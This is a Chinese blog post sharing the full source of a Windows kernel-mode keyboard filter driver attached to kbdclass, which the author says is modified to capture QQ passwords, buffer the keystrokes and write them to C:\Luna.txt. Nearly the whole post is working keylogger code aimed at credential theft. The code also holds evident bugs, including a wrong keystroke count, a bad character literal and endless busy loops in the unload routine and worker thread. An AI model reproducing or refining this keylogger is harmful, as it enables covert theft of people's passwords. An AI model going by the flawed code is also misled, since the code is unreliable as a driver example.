Windows驱动过滤--kdbclass过滤,寒江独钓加强版
寒江独钓键盘过滤,修改了下,过滤QQ密码写入buff,有 回车 或者buff满写入文件,因为irp完成,irp对应的内存快回收,所以用全局缓冲区。开启一个线程写入,开始打算用队例一个一个处理irp的,但是发现那样比较缓慢,只好这样了。。创建进程回调代码加几行就行,这里没写,因为代码丢失了,算是个大概的代码吧。给初学的分享下。有错指出,谢谢。
前辈们不要见笑了。
struct.h
/************************************/ //author:DuanYueming //data: 02/05/2015 //File: Lstruct.h /************************************/ #ifndef _LSTRUCT_H_ #define _LSTRUCT_H_ typedef struct _DEVICE_EXTENSION { PDEVICE_OBJECT pDeviceObj; PDEVICE_OBJECT pAttachDev; //上层设备 PDEVICE_OBJECT pLowDevice; //底层设备 PDEVICE_OBJECT pStorageDev; //存储的设备 PDEVICE_OBJECT pTarDevice; //目标设备 UNICODE_STRING MyDeviceName; UNICODE_STRING MyDeviceSym; ULONG pMyDevFlg; IO_REMOVE_LOCK MoveLock; }DEVICE_EXTENSION,*PDEVICE_EXTENSION; typedef struct _MultVar { PVOID pBuff; KEVENT WaitEvent; ULONG Length; }MULTVAR,*PMULTVAR; #define BUFF_SIZE 256 typedef struct _MY_BUFF { PUCHAR pBuf; int MaxSize; int CurSize; int Offset; }MYBUFF,*PMYBUFF; typedef struct _MY_DATA { PIRP Irp; PVOID pBuff; LIST_ENTRY ListEntry; }MY_DATA,*PMYDATA;
#define MyDeviceFlags 'LUNA' #define MyCdoDeviceFlags 'LCdo' #define RemoveTag 'Lmn' #define DELAY_ONE_MICROSECOND (-10) #define DELAY_ONE_MILLISECOND (DELAY_ONE_MICROSECOND*1000) #define DELAY_ONE_SECOND (DELAY_ONE_MILLISECOND*1000) #define IS_MY_DEVICE_OBJECT(_obj) \ (((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags || PDEVICE_EXTENSION(_obj->DeviceExtension)->pMyDevFlg == MyDeviceFlags) #define IS_MY_CONTROL_DEVICE(_obj) \ (((PDEVICE_EXTENSION)_obj->DeviceExtension)->pMyDevFlg == MyCdoDeviceFlags)
/********未归档函数************/ NTSTATUS ObReferenceObjectByName( PUNICODE_STRING ObjectName, ULONG Attributes, PACCESS_STATE AccessState, ACCESS_MASK DesiredAccess, POBJECT_TYPE ObjectType, KPROCESSOR_MODE AccessMode, PVOID ParseContext, PVOID *Object ); extern POBJECT_TYPE *IoDriverObjectType;
NTSTATUS LQueryObjectName(PVOID Lobject,PUNICODE_STRING name)//查询文件名 { NTSTATUS status; POBJECT_NAME_INFORMATION pBuff; WCHAR cache[64]; ULONG NeedLength; pBuff = (POBJECT_NAME_INFORMATION)cache; status = ObQueryNameString(Lobject,pBuff,64*sizeof(WCHAR),&NeedLength); if (status == STATUS_INFO_LENGTH_MISMATCH) { pBuff =(POBJECT_NAME_INFORMATION) ExAllocatePool(NonPagedPool,NeedLength); if (pBuff == NULL) { return STATUS_INSUFFICIENT_RESOURCES; } RtlZeroMemory(pBuff,NeedLength); status = ObQueryNameString(Lobject,pBuff,NeedLength,&NeedLength); } name->Length = 0; RtlCopyUnicodeString(name,&pBuff->Name); return status; } VOID LUnInstallDriver(PDRIVER_OBJECT pDriverObject) { PDEVICE_EXTENSION pDevExt; PRKTHREAD CurrentThread; LARGE_INTEGER time; PDEVICE_OBJECT pDevObj; time = RtlConvertLongToLargeInteger(100*DELAY_ONE_SECOND); pDevObj = pDriverObject->DeviceObject; CurrentThread = KeGetCurrentThread(); KeSetPriorityThread(CurrentThread,LOW_REALTIME_PRIORITY); while (pDevObj) { pDevExt =(PDEVICE_EXTENSION) pDevObj->DeviceExtension; IoDeleteSymbolicLink(&pDevExt->MyDeviceSym); pDevObj = pDevObj->NextDevice; IoDetachDevice(pDevExt->pLowDevice); IoDeleteDevice(pDevExt->pDeviceObj); } while (1) { } KdPrint(("Driver UnInstall Complete,leave\n")); } NTSTATUS LDispatchRoutine(PDEVICE_OBJECT pDeviceObject,PIRP pIrp) { PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp); IoSkipCurrentIrpStackLocation(pIrp); return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObject->DeviceExtension)->pLowDevice,pIrp); }
以下是代码:
#include "QFilter.h" NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject,PUNICODE_STRING pRegistryPath) { int i; NTSTATUS status; HANDLE Thread; /********初始化全局变量***********/ IsWriteData = FALSE; IsNeedFilter = FALSE; InitializeListHead(&g_list); g_buff =(PMYBUFF) ExAllocatePool(NonPagedPool,sizeof(MYBUFF)); if (g_buff ==NULL) { KdPrint(("no through memory \n")); return 0; } else { g_buff->pBuf =(PUCHAR)ExAllocatePool(NonPagedPool,BUFF_SIZE); ASSERT(g_buff->pBuf); g_buff->MaxSize = BUFF_SIZE; g_buff->Offset = 0; g_buff->CurSize = 0; } /********初始化全局变量***********/ pDriverObject->DriverUnload = LUnInstallDriver; for (i = 0;i <IRP_MJ_MAXIMUM_FUNCTION;i++) { pDriverObject->MajorFunction[i] = LDispatchRoutine; } pDriverObject->MajorFunction[IRP_MJ_READ] = ReadRoutine; pDriverObject->MajorFunction[IRP_MJ_POWER] = PowerRoutine; pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = ContrlRoutine; //pDriverObject->MajorFunction[IRP_MJ_CLOSE] = CloseIrp; status = CreateMyCDODevice(pDriverObject); if (!NT_SUCCESS(status)) { return status; } status = BindKbdDriver(pDriverObject); if (!NT_SUCCESS(status)) { return status; } status = PsCreateSystemThread(&Thread,GENERIC_ALL,NULL,NULL,NULL,ProcessIrp,NULL); if (!NT_SUCCESS(status)) { KdPrint(("Create Thread Failed \n")); return status; } KdPrint(("Start Kbd Filter SuccessFuly \n")); return STATUS_SUCCESS; } VOID ProcessIrp(PVOID pContext) { // PMYDATA data; PVOID buff = NULL; for (;;) { // PLIST_ENTRY HeadData = RemoveHeadList(&g_list); // data = CONTAINING_RECORD(HeadData,MY_DATA,ListEntry); if (IsWriteData == TRUE&& g_buff->pBuf != NULL) { KdPrint(("hehehehe\n")); KdPrint(("111\n")); KdPrint(("2222\n")); MyWriteDataFile(); RtlZeroMemory(g_buff->pBuf,g_buff->MaxSize); g_buff->CurSize = 0; g_buff->Offset = 0; } } } NTSTATUS PowerRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp) { PoStartNextPowerIrp(pIrp); IoSkipCurrentIrpStackLocation(pIrp); return PoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp); } NTSTATUS CreateMyCDODevice(PDRIVER_OBJECT pDriverObj) { NTSTATUS status; UNICODE_STRING DevSym; UNICODE_STRING DevName; PDEVICE_OBJECT pNewDev; PDEVICE_EXTENSION pDevExt; RtlInitUnicodeString(&DevName,L"\\Device\\QFilter"); status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),&DevName,FILE_DEVICE_UNKNOWN,0,TRUE,&pNewDev); if (!NT_SUCCESS(status)) { KdPrint(("Create CDO DevObj Failed \n")); return status; } RtlInitUnicodeString(&DevSym,L"\\??\\QFilterSym"); status = IoCreateSymbolicLink(&DevSym,&DevName); if (!NT_SUCCESS(status)) { KdPrint(("Create Cdo Symbolic Failed \n")); IoDeleteDevice(pNewDev); return status; } pNewDev->Flags |=DO_BUFFERED_IO; pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension; pDevExt->pMyDevFlg = MyCdoDeviceFlags; pDevExt->MyDeviceName = DevName; pDevExt->pDeviceObj = pNewDev; pDevExt->MyDeviceSym = DevSym; return STATUS_SUCCESS; } NTSTATUS BindKbdDriver(PDRIVER_OBJECT pDriverObj) { UNICODE_STRING kbdClass; PDEVICE_OBJECT pNewDev; PDEVICE_OBJECT pTarDev; PDEVICE_OBJECT pLowDev; PDEVICE_EXTENSION pDevExt; PDRIVER_OBJECT pKbdDrOb; NTSTATUS status = STATUS_SUCCESS; RtlInitUnicodeString(&kbdClass,L"\\Driver\\kbdclass"); status = ObReferenceObjectByName(&kbdClass,OBJ_CASE_INSENSITIVE,NULL,0,*IoDriverObjectType,KernelMode,NULL,(PVOID*)&pKbdDrOb); if (!NT_SUCCESS(status)) { KdPrint(("Load KbdObj Failed :%x\n",status)); return status; } ObDereferenceObject(pKbdDrOb); pTarDev = pKbdDrOb->DeviceObject; while (pTarDev) { status = IoCreateDevice(pDriverObj,sizeof(DEVICE_EXTENSION),NULL,pTarDev->DeviceType,pTarDev->Characteristics,FALSE,&pNewDev); if (!NT_SUCCESS(status)) { KdPrint(("Create Device Failed:%x\n",status)); return status; } else { status = IoAttachDeviceToDeviceStackSafe(pNewDev,pTarDev,&pLowDev); if (!NT_SUCCESS(status)) { KdPrint(("Bind Failed \n")); return status; } pDevExt = (PDEVICE_EXTENSION)pNewDev->DeviceExtension; pNewDev->Flags |= pLowDev->Flags&(DO_BUFFERED_IO | DO_DIRECT_IO |DO_POWER_PAGABLE); pNewDev->Flags &= ~DO_DEVICE_INITIALIZING; pDevExt->pDeviceObj = pNewDev; pDevExt->pMyDevFlg = MyDeviceFlags; pDevExt->pLowDevice = pLowDev; pDevExt->pAttachDev = pTarDev; pNewDev->StackSize = pDevExt->pLowDevice->StackSize+1; //IoInitializeRemoveLock(&pDevExt->MoveLock,0,0,0); } pTarDev = pTarDev->NextDevice; } RtlInitUnicodeString(&FileName,L"\\DosDevices\\C:\\Luna.txt"); KdPrint(("Complete Device Bind \n")); return STATUS_SUCCESS; } VOID MyWriteDataFile() { HANDLE handl; OBJECT_ATTRIBUTES objAttr; IO_STATUS_BLOCK block; NTSTATUS status; InitializeObjectAttributes(&objAttr,&FileName,OBJ_CASE_INSENSITIVE,NULL,NULL); status = ZwCreateFile(&handl,GENERIC_WRITE,&objAttr,&block,NULL,FILE_ATTRIBUTE_NORMAL,0,FILE_OPEN_IF,FILE_SYNCHRONOUS_IO_NONALERT,NULL,0); if (!NT_SUCCESS(status)) { KdPrint(("Create File Storage data Failed:%x",status)); return; } status = ZwWriteFile(handl,NULL,NULL,NULL,&block,g_buff->pBuf,g_buff->CurSize,0,NULL); if (!NT_SUCCESS(status)) { KdPrint(("WriteFile Failed:%X \n",status)); ZwClose(handl); return; } KdPrint((" code:%C \n",g_buff->pBuf)); ZwClose(handl); } NTSTATUS ReadCompleteFun(PDEVICE_OBJECT pDeviceObj,PIRP pIrp,PVOID pContext) { ULONG KeyStructNum; PKEYBOARD_INPUT_DATA ptr; ULONG i; UCHAR ASCIICODE; if(/*IsNeedFilter &&*/NT_SUCCESS(pIrp->IoStatus.Status) ) { KeyStructNum = pIrp->IoStatus.Information/(pIrp->IoStatus.Information/sizeof(KEYBOARD_INPUT_DATA)); ptr =(PKEYBOARD_INPUT_DATA) pIrp->AssociatedIrp.SystemBuffer; for (i =0 ;i <KeyStructNum;++i) { ASCIICODE = print_keystroke(ptr[i].MakeCode); if(g_buff->Offset >= (BUFF_SIZE-(5*UCHARSIZE)) || ASCIICODE == '0x0D') { KdPrint(("steup write data!!!!!!!!!!!!!!!!!!!\n")); IsWriteData =TRUE; RtlCopyMemory(((g_buff->pBuf)+(g_buff->Offset)),&ASCIICODE,UCHARSIZE); g_buff->Offset += UCHARSIZE; g_buff->CurSize +=UCHARSIZE; } else { IsWriteData =FALSE; KdPrint(("------buff small---Start Write Data to File-- \n")); } } } if (pIrp->PendingReturned) { IoMarkIrpPending(pIrp); } return pIrp->IoStatus.Status; } NTSTATUS ReadRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp) { PIO_STACK_LOCATION stack; NTSTATUS status = STATUS_SUCCESS; if (pIrp->CurrentLocation ==1) { pIrp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST; pIrp->IoStatus.Information = 0; IoCompleteRequest(pIrp,IO_NO_INCREMENT); return STATUS_INVALID_DEVICE_REQUEST; } if (IS_MY_CONTROL_DEVICE(pDeviceObj)) { pIrp->IoStatus.Status = STATUS_SUCCESS; pIrp->IoStatus.Information = 0; IoCompleteRequest(pIrp,IO_NO_INCREMENT); return STATUS_SUCCESS; } stack = IoGetCurrentIrpStackLocation(pIrp); IoCopyCurrentIrpStackLocationToNext(pIrp); IoSetCompletionRoutine(pIrp,ReadCompleteFun,NULL,TRUE,TRUE,TRUE); return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp); } NTSTATUS ContrlRoutine(PDEVICE_OBJECT pDeviceObj,PIRP pIrp) { PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(pIrp); if (IS_MY_CONTROL_DEVICE(pDeviceObj)) { switch(stack->Parameters.DeviceIoControl.IoControlCode) { } } switch(stack->Parameters.DeviceIoControl.IoControlCode) { default: IoSkipCurrentIrpStackLocation(pIrp); return IoCallDriver(((PDEVICE_EXTENSION)pDeviceObj->DeviceExtension)->pLowDevice,pIrp); } }